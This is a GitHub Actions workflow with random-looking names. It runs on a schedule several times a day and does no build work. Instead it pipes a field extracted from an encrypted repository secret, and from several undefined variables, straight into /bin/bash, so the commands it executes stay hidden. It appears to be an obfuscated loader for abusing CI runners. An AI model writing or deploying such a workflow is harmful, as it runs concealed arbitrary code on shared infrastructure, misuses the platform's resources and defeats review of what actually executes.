name: renquanniu3481
on:
  workflow_dispatch:
  schedule:
    - cron: '0 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: renquanniu3481
        env:
          zzpfp9: ${{ secrets.zzpfp9 }}
        run: |
          echo $zzpfp9 | jq -r .xo00 | /bin/bash
          echo $o946 | jq -r .sfkxv20763 | /bin/bash
          echo $hq192 | jq -r .mq526 | /bin/bash
          echo $muz07 | jq -r .vq52781 | /bin/bash
          echo $oaihc923 | jq -r .bndl93 | /bin/bash
          echo $wzbp5002 | jq -r .l72 | /bin/bash

